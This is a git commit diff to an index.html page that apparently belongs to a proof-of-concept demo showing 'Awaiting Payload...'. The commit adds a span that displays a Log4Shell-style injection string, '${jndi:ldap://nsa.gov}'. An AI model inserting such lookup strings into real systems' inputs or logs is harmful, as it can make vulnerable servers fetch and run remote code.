README stuff (#2)

* Update README.md

* Update README.md

* Update index.html
This commit is contained in:
Specter 2021-12-13 02:09:47 -05:00 committed by GitHub
parent 0f97232d25
commit 4e8f0f16c2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 1 deletions

View File

@ -46,6 +46,11 @@
transform: translate(-50%, -50%); transform: translate(-50%, -50%);
} }
.j {
font-size: 15px;
color: #2F3335;
}
</style> </style>
<script> <script>
function allset() { function allset() {
@ -67,9 +72,12 @@
</html> </html>
<body onload="setTimeout(poc, 1500);"> <body onload="setTimeout(poc, 1500);">
<div id="loader" class="loader"></div> <div id="loader" class="loader"></div>
<div id="awaiting" class="info" style="display:none;"> <div id="awaiting" class="info" style="display:none;">
Awaiting Payload... Awaiting Payload...
<br />
<span class="j">${jndi:ldap://nsa.gov}</span>
</div> </div>
<div id="allset" class="info" style="display:none;"> <div id="allset" class="info" style="display:none;">
@ -79,4 +87,4 @@
</body> </body>
<script> <script>
</script> </script>